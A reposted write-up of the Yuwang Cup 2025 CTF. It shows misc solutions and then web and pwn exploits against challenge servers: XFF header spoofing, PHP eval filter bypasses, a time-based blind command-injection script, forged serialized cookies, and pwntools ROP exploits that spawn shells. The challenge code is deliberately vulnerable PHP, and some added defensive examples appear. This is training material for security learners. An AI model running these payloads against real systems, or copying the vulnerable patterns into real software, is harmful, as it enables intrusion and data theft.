Yuwang Cup (御网杯) 2025 WriteUp

admin 2026-01-28 06:54:42 Network security articles Source: ZONE.CI 全球网

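Article summary: This article provides a WriteUp for the 御网杯 2025 CTF, covering four categories: Crypto, Misc, Web and Pwn. The author considers the challenges to be on the basic side and suitable for beginner training. It records in detail the solving process for RSA computation, steganography analysis, XFF forgery, command injection bypass and stack pivoting, and gives Python scripts and payloads, which helps CTF beginners understand how these security techniques are applied in practice. Overall score: 75. Categories: CTF, Web security, Binary security, Hands-on experience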


Base64-decode to get the flag.

flag{HNCTFmZ5bM1ZYAi7}

easy_misc

Approach

Decimal to characters -> Base64 decode -> ROT13

From Decimal, From Base64, From Base58 – CyberChef

flag{HNCTF2ypZRYzFeH6U}

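套娃 (nesting dolls)

Approach

First, rename the attachment 套娃.xlsx to 套娃.zip and extract it.

Extraction yields 套娃.txt; rename that to .zip as well.

The contents have the structure of a Word document, so change the extension to .docx.

The flag text had been set to white.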

flag{HNCTF0hZFXnNia}
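The renaming steps above work because each layer is a ZIP container whatever its extension says. The following Python sketch is an added example, not part of the original write-up: it classifies a file by content, follows nested single-file ZIP layers, and lists text runs that are formatted white or marked hidden. The sample document and all function names are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
def identify(data: bytes) -> str:
    """Classify by content (ZIP magic + OOXML part names), never by extension."""
    if not data.startswith(b"PK\x03\x04"):
        return "not-zip"
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
    if "word/document.xml" in names:
        return "docx"
    return "xlsx" if "xl/workbook.xml" in names else "zip"

def unwrap(data: bytes, max_depth: int = 10):
    """Follow single-member ZIP layers; the depth cap bounds hostile nesting."""
    for _ in range(max_depth):
        if identify(data) != "zip":
            break
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            if len(z.namelist()) != 1:
                break
            data = z.read(z.namelist()[0])
    return identify(data), data

def hidden_text(docx: bytes) -> list:
    """Return the text of runs coloured white (FFFFFF) or marked hidden (w:vanish)."""
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    hits = []
    for run in root.iter(f"{{{W}}}r"):
        color = run.find(f"{{{W}}}rPr/{{{W}}}color")
        white = color is not None and color.get(f"{{{W}}}val", "").upper() == "FFFFFF"
        if white or run.find(f"{{{W}}}rPr/{{{W}}}vanish") is not None:
            hits.append("".join(t.text or "" for t in run.iter(f"{{{W}}}t")))
    return hits

def zip_of(name: str, content) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(name, content)
    return buf.getvalue()

# Constructed sample: a minimal document.xml wrapped in two ZIP layers.
DOC = (f'<w:document xmlns:w="{W}"><w:body><w:p><w:r><w:t>visible</w:t></w:r><w:r><w:rPr>'
       '<w:color w:val="FFFFFF"/></w:rPr><w:t>constructed-hidden</w:t></w:r></w:p></w:body></w:document>')
SAMPLE = zip_of("layer.txt", zip_of("word/document.xml", DOC))
```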

Web

YWB_Web_xff

Challenge code

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>企业门户登录系统</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="background"></div>
    <div class="container">
        <div class="header">
            <h1>企业门户登录系统</h1>
            <p>欢迎使用企业门户系统</p>
        </div>
        <div class="content">
            <form class="login-form" method="post" action="">
                <div class="form-group">
                    <label for="username">用户名</label>
                    <input type="text" id="username" name="username" required>
                </div>
                <div class="form-group">
                    <label for="password">密码</label>
                    <input type="password" id="password" name="password" required>
                </div>
                <button type="submit" class="login-btn">登录</button>
            </form>
            <?php
            if ($_SERVER["REQUEST_METHOD"] == "POST") {
                $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
                if ($cip == "2.2.2.1") {
                    echo '<div class="success">';
                    echo '<h2>登录成功!</h2>';
                    $flag = file_get_contents('/flag.txt');
                    echo '<p>flag{' . htmlspecialchars($flag) . '}</p>';
                    echo '</div>';
                } else {
                    echo '<div class="error">';
                    echo '<h2>登录失败</h2>';
                    echo '<p>IP地址验证失败</p>';
                    echo '<p>当前IP: ' . htmlspecialchars($cip) . '</p>';
                    echo '</div>';
                }
            }
            ?>
        </div>
        <div class="footer">
            <p>© 2024 企业门户系统 | 技术支持</p>
        </div>
    </div>
</body>
</html>

Approach

The source shows that we need to send a POST request and supply the IP 2.2.2.1.

Solution code

curl -X POST http://47.105.113.86:40001/ -H "X-Forwarded-For: 2.2.2.1"
flag{9u60w1kemajt}
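The challenge code grants access on a client-supplied header. As an added example (not from the original write-up), the Python sketch below puts that naive check beside a hardened resolver that honours X-Forwarded-For only when the socket peer is a known reverse proxy and then takes the right-most untrusted hop. The proxy range 10.0.0.0/8, the sample addresses and all function names are assumptions made for illustration.

```python
import ipaddress

ALLOWED_IP = "2.2.2.1"  # the address the challenge code compares against
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]  # assumption: our own reverse proxies

def naive_client_ip(remote_addr: str, headers: dict) -> str:
    """Mirrors the challenge: believes whatever the request header says."""
    return headers.get("X-Forwarded-For", remote_addr)

def is_trusted(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)  # raises ValueError on malformed input
    return any(addr in net for net in TRUSTED_PROXIES)

def client_ip(remote_addr: str, headers: dict) -> str:
    """Use XFF only behind a trusted proxy; return the right-most untrusted hop."""
    if not is_trusted(remote_addr):
        return remote_addr  # direct connection: the header is attacker-controlled
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            if not is_trusted(hop):
                return hop
        except ValueError:
            return remote_addr  # malformed entry: fall back to the socket peer
    return remote_addr

def naive_gate(remote_addr: str, headers: dict) -> bool:
    return naive_client_ip(remote_addr, headers) == ALLOWED_IP

def hardened_gate(remote_addr: str, headers: dict) -> bool:
    return client_ip(remote_addr, headers) == ALLOWED_IP

# Constructed requests: a direct one with a forged header, and one relayed by a proxy
# that appended the real peer address after the forged value.
DIRECT = ("203.0.113.7", {"X-Forwarded-For": "2.2.2.1"})
VIA_PROXY = ("10.0.0.5", {"X-Forwarded-For": "2.2.2.1, 203.0.113.7"})
```

Even with correct header handling, a source address is a network attribute and not a credential; the login form's username and password are never checked by the challenge code.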

YWB_Web_命令执行过滤绕过 (command execution filter bypass)

Challenge code

<?php

# flag in flag.php
include("flag.php");

if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];

    if (!preg_match("/system|exec|highlight|show_source|include|passthru|echo|print_r|cat|head|tail|more|less/i", $cmd)) {
        if (preg_match("/flag/i", $cmd)) {
            eval($cmd);
        } else {
            die("HACK!!");
        }
    } else {
        die("HACK!!!");
    }
} else {
    highlight_file(__FILE__);
}

?>

Approach

The challenge calls for bypassing a command-execution filter.

First try flag.php.

That shows the flag is in /tmp/flag.nisp, so construct the payload again.

Solution code

curl 'http://47.105.113.86:40002/index.php?cmd=var_dump($flag);//flag'
curl "47.105.113.86:40002/index.php?cmd=var_dump(file_get_contents('/tmp/flag.nisp'));//flag"
flag{rpuqari28i9l}

easyweb

Challenge code

<?php

if (isset($_POST['cmd'])) {
    @exec($_POST['cmd'], $res, $rc);
    // echorc;
} else {
    echo "It works!";
}

show_source(__FILE__);

?>

Approach

Visiting the page reveals the source code. Reading it shows that the endpoint must be accessed with a POST request, and the hint says the flag is in the file /flag.txt, so write a time-based blind injection script.

Solution code

import requests
import time

TARGET_URL = "http://47.105.113.86:40005/"
FLAG_CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_{}-"
TIMEOUT_THRESHOLD = 3  # delay threshold (seconds)
MAX_FLAG_LENGTH = 50  # assumed maximum flag length
REQUEST_TIMEOUT = TIMEOUT_THRESHOLD + 2  # request timeout

def check_char(position, char):
    """Check whether the character at the given position matches."""
    cmd = f"if [ $(cut -b {position} /flag.txt) = '{char}' ]; then sleep {TIMEOUT_THRESHOLD}; fi"
    try:
        start_time = time.time()
        requests.post(TARGET_URL, data={"cmd": cmd}, timeout=REQUEST_TIMEOUT)
        return time.time() - start_time >= TIMEOUT_THRESHOLD
    except requests.exceptions.RequestException:
        return False

def main():
    flag = ""
    for position in range(1, MAX_FLAG_LENGTH + 1):
        char_found = False

        for char in FLAG_CHARSET:
            if check_char(position, char):
                flag += char
                char_found = True
                print(f"[+] Current flag: {flag}")
                break

        if not char_found:
            print("[!] No more characters found, exiting...")
            break

    print(f"\n[+] Final flag: {flag}")

if __name__ == "__main__":
    main()
flag{d4ek6s7kzztx}

YWB_Web_未授权访问 (unauthorized access)

Approach

The default cookie is O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22guest%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A0%3B%7D

After URL decoding it is user=O:5:"Admin":2:{s:4:"name";s:5:"guest";s:7:"isAdmin";b:0;}

So change it to O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3B%7D and request the page again.

flag{zo84fpgxr98h}
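The cookie above carries the authorization decision in a form the client can edit freely. The Python sketch below is an added example, not part of the original write-up or the challenge's code: the server attaches an HMAC tag when issuing the cookie, rejects any value whose tag is missing or does not match, and then reads the two fields with a strict pattern instead of unserializing an object. The secret, the `value|tag` layout and the function names are assumptions for illustration.

```python
import hashlib
import hmac
import re
from urllib.parse import quote, unquote

SECRET = b"constructed-demo-key"  # assumption: server-side secret, never sent to clients
FORMAT = re.compile(r'O:5:"Admin":2:\{s:4:"name";s:(\d+):"([^"]*)";s:7:"isAdmin";b:([01]);\}')

def _tag(value: str) -> str:
    return hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()

def issue(value: str) -> str:
    """Cookie = value|HMAC(value), URL-encoded like the cookie on the page."""
    return quote(f"{value}|{_tag(value)}", safe="")

def verify(cookie: str):
    """Return the value only if its tag matches; None for unsigned or altered cookies."""
    value, sep, tag = unquote(cookie).rpartition("|")
    if not sep or not hmac.compare_digest(tag.encode(), _tag(value).encode()):
        return None
    return value

def read_claims(cookie: str):
    """Verify first, then parse as plain data with a strict pattern (no object unserialize)."""
    value = verify(cookie)
    m = FORMAT.fullmatch(value) if value else None
    if not m or int(m.group(1)) != len(m.group(2).encode()):
        return None
    return {"name": m.group(2), "isAdmin": m.group(3) == "1"}

def altered_copy(signed: str) -> str:
    """Test fixture: edit the value of a signed cookie while keeping its old tag."""
    return quote(unquote(signed).replace("guest", "admin").replace("b:0", "b:1"), safe="")

GUEST = 'O:5:"Admin":2:{s:4:"name";s:5:"guest";s:7:"isAdmin";b:0;}'
# The modified cookie from the write-up, which carries no tag at all:
FORGED = ("O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22"
          "%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3B%7D")
```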

YWB_Web_反序列化 (deserialization)

Challenge code

<?php
function filter($name){
    $safe = array("flag", "php");
    return str_replace($safe, "hack", $name);
}

class mylogin {
    var $user;
    var $pass;

    function __construct($user, $pass) {
        $this->user = $user;
        $this->pass = $pass;
    }
}

if ($_POST['msg']) {
    $filtered_input = filter($_POST['msg']);

    $a = unserialize($filtered_input);

    if ($a instanceof mylogin) {
        if ($a->pass === "myzS@11wawq") {
            exit();
        } else {
            $tis = "您是小自吧,差一点就成功了!";
        }
    } else {
        $tis = "您输入的信息可能去非洲才能找到哦!";
    }
}
?>

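Approach

Looking at the code, you should realize that filter() only exists to stop you from getting the flag in an unintended way, so the solution mainly lies in the deserialization below. Here user can be anything and pass must be myzS@11wawq; there is nothing else to watch for. Just write code that constructs an object, print its serialized form, and submit that to the server to get the flag.

Solution code

<?php
class mylogin {
    var $user;
    var $pass;
}

// Create a new object
$obj = new mylogin();
$obj->user = "admin";  // the user name can be anything
$obj->pass = "myzS@11wawq";

// Serialize
echo serialize($obj);
?>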
O:7:"mylogin":2:{s:4:"user";s:5:"admin";s:4:"pass";s:11:"myzS@11wawq";}
flag{ptn4pymi1h7o}

Pwn

Canary

Approach

As shown in the figure.

Solution code

from pwn import *
from ctypes import *
from LibcSearcher import *
p = remote('47.105.113.86',30001)
# p = remote('192-168-1-40.pvp4566.bugku.cn',9999)
# p = process('./attachment-8')
context.clear(arch='amd64',os = 'linux',log_level = 'debug')
# context.terminal = ['tmux', 'new-window']
r = lambda : p.recv()
rl = lambda : p.recvline()
rc = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
shell = lambda : p.interactive()
pr = lambda name,x : log.info(name+':'+hex(x))
bd=0x401581
payload=b'a'*104+p64(0)+p64(0)+p64(bd)
sla(b'choice',b'1')
sla(b'code',payload)
sla(b'choice',b'2')
sl(b'3')
shell()
flag{1718540cbc6107c443d227156e50bd72}

ez_pwn

Approach

Stack pivoting

Solution code

from pwn import *
from ctypes import *
from LibcSearcher import *
p = remote('47.105.113.86',30003)
# p = remote('192-168-1-40.pvp4566.bugku.cn',9999)
# p = process('./attachment-8')
# elf was used but never defined in the original script; the path below is an
# assumption taken from the commented-out process() line above
elf = ELF('./attachment-8')
libc = ELF('./libc-2.31.so')
context.clear(arch='amd64',os = 'linux',log_level = 'debug')
# context.terminal = ['tmux', 'new-window']
r = lambda : p.recv()
rl = lambda : p.recvline()
rc = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
shell = lambda : p.interactive()
read_got = elf.got['read']
write_plt = elf.plt['write']
main = 0x4011E9
bss_addr = 0x404000
rdi=0x4012c3
rsi_r15=0x4012c1
rbp=0x40117d
pay = b'a'*0x20+p64(bss_addr+0x300)+p64(rdi)+p64(2)+p64(rsi_r15)+p64(read_got)+p64(0)+p64(write_plt)+p64(main)
sla(b'now',pay)
real_addr = u64(rc(6).ljust(0x8,b'a')) - 0x110fa0
payload2=b'a'*0x28+p64(0x4012bc)+p64(0)*4+p64(0xe6aee+real_addr)
sl(payload2)
shell()
flag{a51a3bdf23919f677efccd90270da72f}


Reposted from: 赛查查, 《御网杯2025 WriteUp》
